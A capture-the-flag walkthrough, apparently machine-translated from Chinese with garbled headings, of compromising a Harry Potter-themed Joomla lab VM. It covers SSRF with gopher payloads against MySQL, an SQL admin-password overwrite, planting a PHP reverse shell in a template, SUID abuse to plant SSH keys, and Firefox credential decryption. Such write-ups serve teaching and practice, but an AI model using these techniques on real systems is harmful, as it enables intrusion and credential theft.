Catalog

One 、 Surviving host discovery

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering

5、 ... and 、 Catalog explosion

1. Default dictionary explosion

2.seclist Dictionary explosion

6、 ... and 、 information gathering

1. see

2. Try binding access

  7、 ... and 、HTTP3 Configuration of

8、 ... and 、 information gathering

  Nine 、ssrf Loophole

1. Fake protocol file

2. Read backup file

3.gopher attack mysql

Ten 、 Sign in snape account number

11、 ... and 、su_cp

Twelve 、 Write the public key and scp transmission

 1. Generating public and private keys

2. Upload public key

3. renamed , Change authority

4. copy to hermoine Of .ssh

13、 ... and 、 Sign in hermoine

  fourteen 、 Raise the right

One 、 Surviving host discovery

Two 、 Port scanning

3、 ... and 、 Service version discovery

Is still 80 and 22 port

Four 、 information gathering

The main page is a picture ,ctrl+u Check the source code is nothing

5、 ... and 、 Catalog explosion

1. Default dictionary explosion

Get is joomla This cms Login screen

and joomla Background login interface

But this information is not enough to help us break through the border , Change the dictionary and scan the results

2.seclist Dictionary explosion

Burst out one note.txt

6、 ... and 、 information gathering

1. see

A prompt message appears , Use http3 To access this domain name .

2. Try binding access

sudo vim /etc/hosts

Found before us ip Visit the same

  7、 ... and 、HTTP3 Configuration of

1. download quiche

git clone --recursive https://www.github.com/cloudflare/quiche

2. install cargo Components

sudo apt install cargo

3.cmake Components

sudo apt install cmake

4. Installation example

There's a mistake , Perform the next step

cd ./quiche

cargo build --examples

5. uninstall rustc

apt purge rustc

6. reinstall

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

7. Set the environment variable

source $HOME/.cargo/env

8. Re Download

cargo build --examples

9. Check the installation contents

cargo test

Burst a pile ok Check that there is no mistake

10. utilize http3 To visit url

There's a catalog , Mentioned backup files , Try to visit

8、 ... and 、 information gathering

 1. Through the first message , We visited this directory , There is an internal network resource acquisition interface , There is ssrf Loophole .

2. There is a configuration backup file

The access configuration file exists in the directory , You can download to the backup file

   http://192.168.0.100/joomla/configuration.php.bak

3. Backup file

Collect the user name and password database name of the login database

  Nine 、ssrf Loophole

1. Fake protocol file

Detected passwd file , There are several useful information , Can pass /bin/bash Logged-in user , and mysql This account . Prove to have mysql database , adopt ssrf Loophole coordination gopher Pseudo protocol can attack intranet applications .

2. Read backup file

utilize ssrf Cooperate with pseudo agreement , You can also read backup files

3.gopher attack mysql

（1） Download tool

git clone https://www.github.com/tarunkant/Gopherus.git

（2） Use

It must be ssrf The interface is submitted twice more , Sometimes the result will not be returned

Directly generated a payload, Go check the table

Regenerate into one payload Go to check the fields

  After analysis, you can get the account number and password

[email protected]

<$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay

The password is complex Can't crack

（4） rewrite site_admin password

echo "123" | md5sum

e7df7cd2ca07f4f1ab415d457a6e1c13

（5） Write to database

use joomla;update joomla_users set password="e7df7cd2ca07f4f1ab415d457a6e1c13" where username="site_admin";

 （6） Log in backstage

site_admin/123

（7） Write bounce shell file

utilize kali Self contained php rebound shell

rebound shell File path ：/usr/share/webshells/php

Template path ：/joomla/templates/protostar/error.php

Write to template

（8） After the visit, it bounced successfully shell

Ten 、 Sign in snape account number

Through the top shell We can creds.txt Get one of them bash64 password

Decrypt ：

echo " " | base64 -d

In Harry Potter snape The professor likes lilly, So guess this is snape Password

[email protected]

1.flag1.txt

SlythEriN's LocKEet dEstroYeD bY RoN

11、 ... and 、su_cp

Here's one su_cp, Yes suid jurisdiction , The function is to copy .

Twelve 、 Write the public key and scp transmission

 1. Generating public and private keys

ssh-keygen

2. Upload public key

scp id_rsa.pub [email protected]~/

3. renamed , Change authority

mv id_rsa.pub authorized_keys

chmod 640 authorized_keys

4. copy to hermoine Of .ssh

./su_cp -p ~/id_rsa.pub ../.ssh

13、 ... and 、 Sign in hermoine

Get the second flag.txt, Decrypt it

Helga Hufflepuff's Cup destroyed by Hermione  

  fourteen 、 Raise the right

1. Find out

  In the home directory , Found a hidden folder .mozilla( browser ), There's a firefox（ firefox ）,firefox Generally speaking, it can only be on the client , But here it appears on the server . It can be used to raise rights /

 2. Download the tool to read Firefox information

git clone https://github.com/unode/firefox_decrypt.git

3.firefox Copy to local

scp -r  [email protected]:~/.mozilla/firefox ./

4.firefox_decrypt

5. direct ssh Sign in

  After decryption ：

 Diadem of Ravenclaw destroyed by [email protected]